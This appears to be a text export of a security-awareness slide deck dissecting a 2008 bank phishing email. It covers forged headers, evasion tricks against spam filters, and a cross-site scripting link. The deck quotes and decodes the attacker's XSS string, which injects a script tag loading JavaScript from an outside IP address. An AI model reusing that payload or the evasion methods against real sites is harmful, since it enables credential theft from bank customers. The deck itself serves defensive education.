deconstructing a phishing scheme

Deconstructing

A Phishing Scheme

Christopher Duffy, CISSP

Agenda• Definition• Examples• Breakdown• Follow Through• Statistics• Sites

Defined

"phishing is a criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication.“

-Wikipedia

Catching a Phish

• Complete Attack • 1st effort to use clients as relay• Cross- Site Scripting Attack– email was not sent from the bank.– e web page it linked to contained extra characters in

the URL address line - added on to the bank’s legitimate web address

– page was hosted by the bank’s servers, overlaid it with altered elements to give the appearance of a legitimate “Account Verification” page.

Email Breakdown

• Header Info– Incorrect Return Address

Return-Path: billing@suntrust.com The return address is generated from the From: address

and applied by the final SMTP server to handle the message.

– Most scams forge the From: address. – This can be the only obfuscation a phisher employs; – forging From: headers is a trivial task, and is often a

feature of normal client mail user agents.

True Received: Header

• Received: from jeannedarc-2-82-67-84-75.fbx.proxad.net (82.67.84.75) – Received: headers are written in reverse; in this case, 82.67.84.75

is the last SMTP server to handle the message before the final destination. As such, it is the only trustworthy

– Received: information, and is in fact the true source of the message. 82.67.84.75 is a node in a French consumer ISP, and is likely a home PC previously compromised by the phisher

Forged Received: Header

• Received: from smtp-harpsichord.poland.billing@suntrust.com ([82.67.84.75]) by b68ky1.billing@suntrust.com with Microsoft SMTPSVC(5.0.4416.5263)– This Received: line is forged. Some anti-spam software will trust the

Received: headers as a means of authenticating the source of the message, so adding extra Received:’s is an anti-spam evasion technique.

– Additional Evidence that this is a forgery is the fact that the IP address is identical to the address in the true Received: header. Also notice the presence of the “billing@suntrust.com” string in the fake server name; normal server names cannot have @-signs in their name.

– The names include the random dictionary words “harpsichord” and “poland” in an effort to evade Bayesian spam.

Incorrect Time Stamp

• Tue, 12 Nov 2008 07:12:03 -0100 – Timestamp Most Likely From a Comprimised PC• (Out of Sync Clock)

• Forged From: Name and Address– From: Suntrust Billing Departmentbilling@suntrust.com

• the forged From: field is reflected in the Return-Path field

– Most Likely a True email within Suntrust

• Impersonal To: Name, if Any– To: Valued Suntrust Customer ,or– To:emailname@isp.com– No Salutation

Threats

• Account Compromised• Suspension• Upgrades in the Name of Security

– Colorado Business Bank has registered our secure Web sites with VeriSign and use VeriSign Server IDs.VeriSign Server IDs enable you to verify the authenticity of our secure Web site and to communicate with our Web site securely via SSL (Secure Sockets Layer) encryption.

Proceed to customer service department>>

No RTF

• HTML-only messageContent-Type: text/html;– Delivered in HTML only, no RTF, or plain text.– Mail User Agent (MUA) Compatibility

What???

• Spurious Random Words

Content-Description: lonesome hysteria ulterior• Randomizer to avoid Bayesian Spam Filters

Hijacked

• Use of Trusted Logo’s & Images• Linked Directly to Site• Sense of Legitimacy

ESL• Phishing activity outside US= Non Native• Origination of Phishing & Spam– Countries Hosting Phishing Sites Q1 2008• Russia 11.66• China 10.3• Germany 5.64• Romania 5.09

XSS

• Cross Site Scripting Attacks– Cross site scripting (also known as XSS) occurs

when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it.

XSS Deconstruction<a title=3D"http://suntrust.com/" target=3D"_blank"

herf=3D"http://www.sun=trust.com/onlinestatements/index.asp?

AccountVerify=3Ddf4g653432fvfdsGFSg45=wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=3D%22%3E

%3Cscript+language=%3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2E138%3A8=%3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E">click here</a> to confirm you=r bank account records. <br>

• SCREEN TIP TARGET OBSFUCATION<a title=3D"http://suntrust.com/" target=3D"_blank“Mouse Over to distract from real target link

XSS Payload

• Link to True Siteherf=3D"http://www.sun=trust.com/onlinestatements/index.asp?

AccountVerify=3Ddf4g653432fvfdsGFSg45=Link target is Suntrust, following is XSS Payload (HEX)• wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo

=3D%22%3E%3Cscript+language=%3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2E138%3A8=%3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E">click here</a>

HEX DeCoded

• Hex-encoded HTTP parameters string. Decoded, it reads "><SCRIPTlanguage=javascript src="http://218.103.23.138:8081/sun/sun.js"</SCRIPT>

• Link Executes sun.js• 218.103.23.138 Resolves to ISP in Hong Kong

Top Phishing

• Keyloggers & Maclious Code, up 93% from ’07• ISP’s• IRS

Mitigation Through Education

– Don’t click to Follow– Don’t trust Links– No Personal Information via email– Check out the URL– Let your Fingers Do the Walking

Type it In !

SecurityCartoon.com

More Information

• Internet Crime Centerwww.ic3.gov• Identity Theft: What to do if It Happens to Youhttp://www.privacyrights.org/fs/fs17a.htm• Federal Trade Commission phishing informationhttp://www.ftc.gov/bcp/conline/pubs/alerts/phishingalrt.htm• Video tutorial on phishing:http://www.pcsecuritysecrets.com/tips/media-chase_bank_fraud_and_phising.php• Microsoft Phishing Information Websitehttp://www.microsoft.com/protect/yourself/phishing/identify.mspx

• Anti-Phishing Non Profit Siteswww.antiphishing.org• www.apwg.com• www.bestsecuritytips.com• www.cyberstreet.org• Carnigie Mellon University Gamehttp://cups.cs.cmu.edu/antiphishing_phil/new/index.html